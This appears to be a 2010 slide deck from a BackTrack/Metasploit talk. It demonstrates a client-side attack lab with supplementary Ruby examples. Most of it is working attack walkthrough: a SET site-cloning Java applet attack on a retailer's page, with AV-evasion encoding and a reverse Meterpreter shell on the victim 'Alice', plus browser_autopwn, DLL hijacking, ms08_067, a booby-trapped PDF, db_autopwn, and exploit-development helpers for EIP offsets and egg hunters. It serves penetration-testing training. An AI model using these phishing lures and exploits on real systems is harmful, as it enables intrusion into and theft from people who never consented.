SET (Social Engineering Toolkit), Client-Side Attack Demonstration, browser_autopwn, Automation/Development, Tools for Exploit Developers



Episode IV

Slide deck dated 05/11/10.


SET: a Python script by rel1k (Dave Kennedy). Automated attack vectors on top of MSF (the Metasploit Framework): phishing, mass mailing, client-side attacks, Teensy. Version 1.0 brings a web interface and many new features.

Extremely user-friendly:
Select from the menu:
1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. Update the Metasploit Framework
8. Update the Social-Engineer Toolkit
9. Help, Credits, and About
10. Exit the Social-Engineer Toolkit
Enter your choice:


Scanning Alice's external IP
root@bt:~# nmap -T5 -A 192.168.178.254
Host is up (0.00036s latency).
Not shown: 999 filtered ports
PORT    STATE  SERVICE VERSION
113/tcp closed auth
MAC Address: 00:0C:29:97:BA:9F (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Result: every port is filtered except a closed 113/tcp, and the OS cannot even be fingerprinted. There is nothing to attack from the outside, which is why the rest of the demo goes through Alice's browser instead. (-T5 -A is the noisiest profile nmap offers; on a real engagement it will light up any IDS in the path.)


Social engineering channels: email, IM, telephone, VoIP spoofing, etc., in combination with XSS, DNS poisoning, etc. "Can I help you?" / "Can you help me?" A false identity (or several). Reading: Mitnick, The Art of Deception; www.social-engineer.org

Gather information about Alice. Disguise the URL with DynDNS, http://bit.ly, XSS, ... Send her a message (email, SMS, social networks, etc.).

Attacker setup: in the SET main menu shown above, choose 2 (Website Attack Vectors).
Enter your choice: 2

1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu
Enter your choice (press enter for default): 1

[!] Website Attack Vectors [!]
1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu
Enter number (1-4): 2
SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: http://www.zalando.de
[*] Cloning the website: http://www.zalando.de
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: yhyld5e6cdxj90u
[*] Malicious java applet website prepped for deployment

What payload do you want to generate:
Name:
1. Windows Shell Reverse_TCP
2. Windows Reverse_TCP Meterpreter
...
9. Windows Meterpreter Reverse HTTPS
10. Import your own executable
Enter choice (hit enter for default): 2

Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.
1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
...
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)
Enter your choice (enter for default): 15
[-] Enter the PORT of the listener (enter for default): 443
[-] Encoding the payload multiple times to get around pesky Anti-Virus. [-]
[*] x86/shikata_ga_nai succeeded with size 506 (iteration=5)
[*] x86/alpha_upper succeeded with size 2230 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 2375 (iteration=5)
[*] x86/countdown succeeded with size 2465 (iteration=5)
********************************************************
Do you want to create a Linux/OSX reverse_tcp payload in the Java Applet attack as well?
********************************************************
Enter choice yes or no: no
Port 443 is chosen for the listener because outbound 443 is allowed through almost every firewall. Note that stacking encoders only changes the bytes of the stub, not what the payload does once it runs, so it is not a reliable way past AV that executes or emulates the sample.

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************
[--] Tested on IE6, IE7, IE8, Safari, Chrome, and FireFox [--]
[*] Started HTTPS reverse handler on https://0.0.0.0:443/
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...

[Network diagram: attacker and Alice's machine, ports 445 and 80]
Lure text sent to Alice: "Click here to get hacked" / "new shoes" (pointing at the cloned Zalando site)


As soon as Alice opens the cloned site and lets the applet run, the handler started above reports:
[*] Sending stage (749056 bytes) to 192.168.178.254
[*] Meterpreter session 1 opened (192.168.178.26:443 -> 192.168.178.254:49421) at Thu Nov 04 23:15:41 +0100 2010

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WIN-H9NLHRGF8E5\alice
meterpreter > shell
Process 4016 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\alice\Desktop>
The shell runs as alice on a Windows 7 box (6.1.7600), not as SYSTEM: no vulnerability was exploited, the applet simply ran with the rights of the user who clicked "Run".


Equally susceptible to the Java applet attack: Linux, OSX, Windows, with the following browsers: IE6, IE7, IE8, Safari, Chrome, Firefox. The attack does not depend on a browser bug: the applet is self-signed and only runs after the user accepts the security warning, which is exactly why it works on every platform that has a Java plugin.

Demo (which hopefully works ;-])

DLL binary planting: the application calls LoadLibrary() with a bare DLL name instead of a full path, so Windows walks the DLL search order (including the directory the document was opened from, here a WebDAV share) and loads the attacker's DLL. Usable for far more than browser attacks. The fix on the application side is to load with a fully qualified path or to call SetDllDirectory("") so the current directory drops out of the search order.
msf > use exploit/windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(webdav_dll_hijacker) > show options
msf exploit(webdav_dll_hijacker) > set EXTENSION ppt pptx
EXTENSION => ppt pptx

Demo (which hopefully works ;-])

Client-side attack scenarios:
SET Java Applet Attack: own 'em all!
webdav_dll_hijacker: the "no fix" vuln
ie_aurora: the Google hack
adobe_media_newplayer: Acrobat 9.2 exploit
adobe_shockwave_rcsl_corruption
ms10_xxx_windows_shell_lnk_execute: Stuxnet
and many more ;)


browser_autopwn: developed by egyp7 (a.k.a. James Lee), presented at DEFCON 17. Modelled on the drive-by infection kits used by criminals. Detects the visitor's browser and operating system with JavaScript and automatically selects the matching exploits.

Exploit modules it can serve (selection):
java_calendar_deserialize
java_trusted_chain
mozilla_compareto
mozilla_navigatorjava
opera_configoverwrite
opera_historysearch
safari_metadata_archive
apple_quicktime_marshaled_punk
apple_quicktime_rtsp
apple_quicktime_smil_debug
ie_createobject
ms03_020_ie_objecttype
ms10_018_ie_behaviors
winzip_fileview

msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set URIPATH /
URIPATH => /
msf auxiliary(browser_autopwn) > set LHOST 192.168.178.26
LHOST => 192.168.178.26
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed
msf auxiliary(browser_autopwn) >
[*] Starting exploit modules on host 192.168.178.26...
[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/rksxd8zz0
[*] Local IP: http://192.168.178.26:8080/rksxd8zz0
[*] Server started.
(further modules omitted on the slides)
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/o0aiy2amfax
[*] Local IP: http://192.168.178.26:8080/o0aiy2amfax
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.178.26:3333
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 192.168.178.26:6666
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.178.26:7777
[*] Starting the payload handler...
[*] --- Done, found 15 exploit modules
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.178.26:8080/
[*] Server started.
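The selection step that browser_autopwn performs behind the output above, as an added example written for these notes (it is not Metasploit's code). The real module fingerprints the visitor with JavaScript and every browser exploit declares its targets in an autopwn_info hash; this example fingerprints from the User-Agent header only, and the module table (names taken from the list above, version ranges and ranks are illustrative assumptions) and the sample User-Agent strings are constructed for the example.

```ruby
# Added example, not browser_autopwn's own code: fingerprint a client and
# pick the exploits whose constraints it satisfies, best rank first.

# Reduce a User-Agent header to {os:, browser:, version:}.
# Assumption: the UA string is the only fingerprint source (the real
# server also runs JavaScript in the browser).
def fingerprint(ua)
  os = case ua
       when /Windows/  then "Windows"
       when /Mac OS X/ then "Mac OS X"
       when /Linux/    then "Linux"
       else "Unknown"
       end
  browser, version =
    if    (m = ua.match(/MSIE (\d+(?:\.\d+)*)/))              then ["MSIE", m[1]]
    elsif (m = ua.match(/Firefox\/(\d+(?:\.\d+)*)/))          then ["Firefox", m[1]]
    elsif (m = ua.match(/Chrome\/(\d+(?:\.\d+)*)/))           then ["Chrome", m[1]]
    elsif (m = ua.match(/Version\/(\d+(?:\.\d+)*).*Safari/))  then ["Safari", m[1]]
    else ["Unknown", nil]
    end
  { os: os, browser: browser, version: version }
end

# Exploit table. nil means "any"; min/max are inclusive version bounds.
# The ranges and ranks are placeholders for the example, not the modules'
# real target lists.
MODULES = [
  { name: "windows/browser/ms10_018_ie_behaviors", os: "Windows", browser: "MSIE",
    min: "6.0", max: "8.0", rank: 500 },
  { name: "windows/browser/ie_createobject",       os: "Windows", browser: "MSIE",
    min: "5.0", max: "6.0", rank: 450 },
  { name: "multi/browser/java_trusted_chain",      os: nil,       browser: nil,
    min: nil,   max: nil,    rank: 400 },
  { name: "multi/browser/mozilla_compareto",       os: nil,       browser: "Firefox",
    min: "1.0", max: "1.5.99", rank: 300 },
]

def version_in_range?(version, min, max)
  return true if min.nil? && max.nil?
  return false if version.nil?
  v = Gem::Version.new(version)
  (min.nil? || v >= Gem::Version.new(min)) && (max.nil? || v <= Gem::Version.new(max))
end

# Names of all modules that fit the fingerprint, best rank first. The real
# server then emits those exploits' HTML/JS to the visitor one after another.
def select_exploits(fp, modules = MODULES)
  modules.select { |m|
    (m[:os].nil?      || m[:os]      == fp[:os]) &&
    (m[:browser].nil? || m[:browser] == fp[:browser]) &&
    version_in_range?(fp[:version], m[:min], m[:max])
  }.sort_by { |m| -m[:rank] }.map { |m| m[:name] }
end

if __FILE__ == $0
  # constructed visitor: IE8 on Windows 7
  ua = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  puts select_exploits(fingerprint(ua)).inspect
end
```

The point to take from it: a visitor only gets the exploits that match, so a wrong or missing fingerprint (a UA the regexes do not recognise, JavaScript disabled) silently shrinks the list to the "any browser" modules. That is also why autopwn-style servers can be fooled by a spoofed User-Agent.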


root@bt:/pentest/exploits/framework3# ./msfconsole -h
-r <filename>  Execute the specified resource file
-c <filename>  Load the specified configuration file
root@bt:/pentest/exploits/framework3# cat ~/.msf3/config
[framework/core]
[framework/ui/console]
root@bt:/pentest/exploits/framework3# cp ~/.msf3/config ~/.msf3/config.bak
root@bt:/pentest/exploits/framework3# msfconsole

root@bt:/pentest/exploits/framework3# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > setg lhost 192.168.178.26
lhost => 192.168.178.26
msf exploit(ms08_067_netapi) > set rhost 10.10.10.200
rhost => 10.10.10.200
msf exploit(ms08_067_netapi) > save
Saved configuration to: /root/.msf3/config
msf exploit(ms08_067_netapi) > quit

root@bt:/pentest/exploits/framework3# cat ~/.msf3/config
[framework/core]
lhost=192.168.178.26
ActiveModule=exploit/windows/smb/ms08_067_netapi
payload=windows/meterpreter/reverse_tcp
rhost=10.10.10.200
root@bt:/pentest/exploits/framework3# msfconsole
OR
root@bt:/pentest/exploits/framework3# msfconsole -c meineconfig
msf exploit(ms08_067_netapi) > show options
RHOST  10.10.10.200    yes  The target address
Payload options (windows/meterpreter/reverse_tcp):
LHOST  192.168.178.26  yes  The listen address

To get back to a clean state, either
mv ~/.msf3/config ~/.msf3/config_smb_ms08_067
cp ~/.msf3/config.bak ~/.msf3/config
or
msf exploit(ms08_067_netapi) > unset all
msf exploit(ms08_067_netapi) > unsetg all
msf exploit(ms08_067_netapi) > back
msf > save
Saved configuration to: /root/.msf3/config

Automation through the config file is really only worthwhile for global variables (setg). Everything else is clumsy to handle this way.

root@bt:/pentest/exploits/framework3# ./msfconsole -h
-r <filename>  Execute the specified resource file
-c <filename>  Load the specified configuration file
root@bt:/pentest/exploits/framework3# ./msfconsole
msf > ?
makerc    Save commands entered since start to a file
resource  Run the commands stored in a file
msf exploit(adobe_media_newplayer) > makerc
Usage: makerc <output rc file>
Save the commands executed since startup to the specified file.

msf exploit(adobe_media_newplayer) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_media_newplayer) > set FILENAME freeporn.pdf
msf exploit(adobe_media_newplayer) > set OUTPUTPATH /var/www
msf exploit(adobe_media_newplayer) > /etc/init.d/apache2 start
msf exploit(adobe_media_newplayer) > exploit
[*] Creating 'freeporn.pdf' file...
[*] Generated output file /var/www/freeporn.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_media_newplayer) > makerc /root/pdf-pwn.rc
[*] Saving last 1 commands to /root/pdf-pwn.rc...
msf exploit(adobe_media_newplayer) > quit
Two things worth knowing here: msfconsole hands any command it does not recognise (such as /etc/init.d/apache2 start) to the system shell, which is why it can be recorded in the rc file; and "no session was created" is the normal result for a fileformat module, since the PDF only fires when a victim opens it and a separate handler must be listening by then.

Cleaning up the RC file
root@bt:/pentest/exploits/framework3# vi ~/pdf-pwn.rc
As written by makerc (every command typed, including the interactive ones):
?
use exploit/windows/fileformat/adobe_media_newplayer
set payload windows/meterpreter/reverse_tcp
show options
set FILENAME freeporn.pdf
set OUTPUTPATH /var/www
set LHOST 192.168.178.26
set TARGET 1
/etc/init.d/apache2 start
exploit
Cleaned up (the "?" and "show options" lines only print help and options, they do nothing in an unattended replay):
use exploit/windows/fileformat/adobe_media_newplayer
set payload windows/meterpreter/reverse_tcp
set FILENAME freeporn.pdf
set OUTPUTPATH /var/www
set LHOST 192.168.178.26
set TARGET 1
/etc/init.d/apache2 start
exploit

Cleaning up
root@bt:/pentest/exploits/framework3# rm /var/www/freeporn.pdf
root@bt:/pentest/exploits/framework3# /etc/init.d/apache2 stop
Stopping web server: apache2apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName ... waiting ..
Test: either
msfconsole -r ~/pdf-pwn.rc
or
msf > resource /root/pdf-pwn.rc
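The clean-up of a makerc dump done as a script instead of by hand in vi, added here as an example for these notes (not part of the slides and not a Metasploit tool). It strips the commands that only make sense at an interactive prompt, then checks the result for the mistake that most often breaks an unattended replay: a reverse payload without LHOST. The list of interactive commands is this example's own choice, and the sample rc text is constructed from the pdf-pwn.rc shown above.

```ruby
# Added example, not Metasploit's code: make a makerc dump replayable with
# `msfconsole -r` and lint it before use.

# Commands that print or browse rather than configure: useless in a replay.
# Assumption for this example; extend the list to taste.
INTERACTIVE = /\A(\?|help|show|info|search|makerc|irb|history|sessions\s+-[il])(\s|\z)/

# Keep every line that configures or acts; drop blanks, comments and the
# interactive noise. Returns an array of command strings in their original order.
def clean_rc(text)
  text.each_line.map(&:strip).reject { |line|
    line.empty? || line.start_with?("#") || line =~ INTERACTIVE
  }
end

# Return a list of problems found in a cleaned command list (empty if fine).
def lint_rc(lines)
  problems = []
  settings = {}
  lines.each do |line|
    if (m = line.match(/\Asetg?\s+(\S+)\s+(.+)\z/))
      settings[m[1].upcase] = m[2]      # set/setg are case-insensitive in msfconsole
    end
  end
  payload = settings["PAYLOAD"].to_s
  if payload.include?("reverse") && !settings.key?("LHOST")
    problems << "reverse payload #{payload} but no LHOST set"
  end
  has_exploit = lines.any? { |l| l =~ /\A(exploit|run)\b/ }
  has_use     = lines.any? { |l| l.start_with?("use ") }
  problems << "'exploit' without a preceding 'use'" if has_exploit && !has_use
  problems
end

# Write the cleaned file and return its path (to hand to `msfconsole -r`).
def write_rc(path, lines)
  File.write(path, lines.join("\n") + "\n")
  path
end

# Constructed sample: what makerc wrote in the demo above.
SAMPLE_RC = <<~RC
  ?
  use exploit/windows/fileformat/adobe_media_newplayer
  set payload windows/meterpreter/reverse_tcp
  show options
  set FILENAME freeporn.pdf
  set OUTPUTPATH /var/www
  set LHOST 192.168.178.26
  set TARGET 1
  /etc/init.d/apache2 start
  exploit
RC

if __FILE__ == $0
  lines = clean_rc(SAMPLE_RC)
  puts lines
  warn lint_rc(lines).join("\n")
  # write_rc("/root/pdf-pwn.rc", lines)   # then: msfconsole -r /root/pdf-pwn.rc
end
```

Running it on the sample leaves exactly the eight lines of the cleaned file above and reports no problems; remove the LHOST line and the linter flags the reverse payload, which would otherwise only surface as a failed handler after the PDF has already gone out.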

A prominent example of an RC file (note the old db_sqlite3 backend):
wget http://metasploit.com/users/hdm/tools/karma.rc
cat karma.rc
load db_sqlite3
db_create /root/karma.db
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run


db_autopwn now has regex filters too. Hosts get into the database via db_nmap, or via nmap -oX plus db_import.
root@bt:~# /etc/init.d/mysql start
root@bt:~# msfconsole
msf > db_driver mysql
msf > db_connect root:toor@127.0.0.1/pwndb
msf > db_nmap
msf > db_autopwn
[*] Usage: db_autopwn [options]
-R [rank]    Only run modules with a minimal rank
-I [range]   Only exploit hosts inside this range
-X [range]   Always exclude hosts inside this range
-PI [range]  Only exploit hosts with these ports open
-PX [range]  Always exclude hosts with these ports open
-m [regex]   Only run modules whose name matches the regex
Use the filters: without -R/-m, db_autopwn throws every matching exploit at every host, and low-ranked modules will crash services long before they yield a shell.

Autostart meterpreter scripts
set payload windows/meterpreter/reverse_tcp
show advanced
Name : AutoRunScript
Current Setting:
Description : A script to run automatically on session creation.
Name : InitialAutoRunScript
Current Setting:
Description : An initial script to run on session creation (before AutoRunScript)

Autostart meterpreter scripts
root@bt:/pentest/exploits/framework3# ls scripts/meterpreter/
arp_scanner.rb, autoroute.rb, checkvm.rb, credcollect.rb, enum_shares.rb, enum_vmware.rb, event_manager.rb, file_collector.rb, get_application_list.rb, get_env.rb, get_filezilla_creds.rb, hostsedit.rb, keylogrecorder.rb, killav.rb, metsvc.rb, migrate.rb, multi_console_command.rb, multi_meter_inject.rb, prefetchtool.rb, process_memdump.rb, remotewinenum.rb, scheduleme.rb, schtasksabuse.rb, scraper.rb, screen_unlock.rb, winbf.rb, winenum.rb, wmic.rb

Without Ruby there is no going further here! MSF has its own Ruby API and libraries. With Railgun, MSF also provides a way to call the Windows API directly from a Meterpreter session.

Integrated into msfconsole:
msf > irb
[*] Starting IRB shell
>> puts "Hello, metasploit!"
Hello, metasploit!
>> Framework::Version
=> "3.3-dev"
>> RUBY_VERSION
=> "1.8.7"


HOWTO: get from here to there

Find an existing exploit module that already speaks the protocol in question, then make your changes to it. See Metasploit Unleashed (MSFU) online.


Pattern buffer to find the EIP offset; finding the offset in memory (the MSF tools pattern_create.rb and pattern_offset.rb).
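The pattern trick carried through in code, added here as a worked example for these notes (it is not Metasploit's pattern_create.rb / pattern_offset.rb, but reimplements the same cyclic pattern so the lookup can be followed by hand). The register value 0x41306241 and the offsets used in the demo are constructed: 0x41306241 is what a 32-bit little-endian EIP reads after the buffer bytes "Ab0A" have been written over the saved return address.

```ruby
# Added example, not Metasploit's code: the cyclic pattern behind
# pattern_create / pattern_offset. Every 3-byte group is "Upper lower digit"
# (Aa0 Aa1 ... Aa9 Ab0 ...), so any 4 bytes that land in EIP identify one
# position in the buffer.

MAX_UNIQUE = 26 * 26 * 10 * 3   # 20280 bytes before the groups would repeat

def pattern_create(length)
  buf = "".dup
  ("A".."Z").each do |u|
    ("a".."z").each do |l|
      ("0".."9").each do |d|
        buf << u << l << d
        return buf[0, length] if buf.length >= length
      end
    end
  end
  buf[0, length]   # longer requests are truncated at MAX_UNIQUE here
end

# query: the register value as shown by the debugger ("0x41306241") or the
# raw bytes as they sat in the buffer ("Ab0A"). Returns the offset, or nil
# when the value does not come from the pattern (then EIP was not overwritten
# directly by your buffer: bad characters, a mangled copy, or a different path).
def pattern_offset(query, length = MAX_UNIQUE)
  needle =
    if query =~ /\A0x([0-9a-fA-F]{8})\z/
      [$1].pack("H*").reverse   # little-endian: reverse the bytes back to buffer order
    else
      query
    end
  pattern_create(length).b.index(needle.b)
end

# What a 32-bit little-endian register reads once buf[offset, 4] has been
# written over the saved return address (constructed helper for the demo;
# in real life this value comes from the debugger after the crash).
def eip_after_overflow(buf, offset)
  "0x" + buf[offset, 4].reverse.unpack("H*")[0]
end

if __FILE__ == $0
  buf = pattern_create(2000)         # send this instead of "A" * 2000
  eip = eip_after_overflow(buf, 30)  # pretend the crash showed this in EIP
  puts "#{eip} -> offset #{pattern_offset(eip)}"   # 0x41306241 -> offset 30
end
```

Two practical notes: a nil result is information, not a failure (it tells you the bytes in EIP were not copied verbatim), and the 20280-byte limit matters, because beyond it the stock pattern repeats and an offset is no longer unique.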


Reading and tools: skape (a.k.a. Matt Miller), nologin.org, the corelan tutorials, the MSF generator. For the case where you do not know where the rest of your shellcode ended up: a tiny (extremely freaky) piece of shellcode that searches memory for a pattern, the egg hunter. Pattern found? Execute the code that follows it.
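The egg hunter's search loop, modelled in Ruby as an added example for these notes (it is neither skape's shellcode nor anything from the slides). The real hunter is a few dozen bytes of x86 that walks the address space page by page, asks the kernel (via a syscall such as NtAccessCheckAndAuditAlarm) whether a page is readable, and compares 8 bytes at each address. Two details it gets right are shown: the tag is doubled in front of the payload because the hunter itself carries one copy of it, and unreadable pages are skipped whole instead of faulting. The memory image, the unmapped page and the tag "w00t" are constructed for the example.

```ruby
# Added example, not skape's egg hunter: the search loop in Ruby.

PAGE_SIZE = 4096
EGG = "w00t".b   # 4-byte tag; the payload is preceded by EGG * 2

# Search `memory` (a byte string standing in for the address space) for two
# consecutive copies of `egg`. `unmapped` lists the page numbers that would
# fault on access. Returns the address of the first payload byte, or nil.
def hunt_egg(memory, unmapped, egg = EGG)
  marker = egg * 2
  addr = 0
  while addr + marker.bytesize <= memory.bytesize
    first_page = addr / PAGE_SIZE
    last_page  = (addr + marker.bytesize - 1) / PAGE_SIZE
    if unmapped.include?(first_page) || unmapped.include?(last_page)
      # access would fault: jump to the start of the next page, as the real
      # hunter does after the probing syscall reports an unreadable address
      addr = (first_page + 1) * PAGE_SIZE
      next
    end
    return addr + marker.bytesize if memory.byteslice(addr, marker.bytesize) == marker
    addr += 1
  end
  nil
end

# Constructed address space: page 0 holds the hunter stub (with ONE copy of
# the tag, just as the real hunter embeds it), page 1 is unmapped, page 2
# holds filler, the doubled tag and the payload.
HUNTER_STUB = ("hunter:".b + EGG + ":stub".b).ljust(PAGE_SIZE, "\x90".b)
HOLE        = "\x00".b * PAGE_SIZE
TARGET_PAGE = ("\x90".b * 100) + EGG * 2 + "PAYLOAD".b
MEMORY      = HUNTER_STUB + HOLE + TARGET_PAGE
UNMAPPED    = [1]

if __FILE__ == $0
  at = hunt_egg(MEMORY, UNMAPPED)
  puts "payload found at #{at}: #{MEMORY.byteslice(at, 7)}"   # 8300: PAYLOAD
  puts "a single-copy search would have stopped at #{MEMORY.index(EGG)} (the hunter itself)"
end
```

The doubled tag is not decoration: MEMORY.index(EGG) returns 7, the copy inside the hunter stub, so a hunter that searched for one copy would jump back into itself. The page skip is the other half of the design; without it the first unmapped page kills the process before the search reaches the payload.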


Thanks to: the Metasploit dev team (hdm, egyp7, etc.), the BackTrack dev team, the German BackTrack team and community, rel1k, irongeek, corelanc0d3r, carnal0wnage, DarkOperator, Mubix, and many more.

Contact: 5M7X@back-track.de, http://twitter.com/5m7x, IRC: #back-track.de on freenode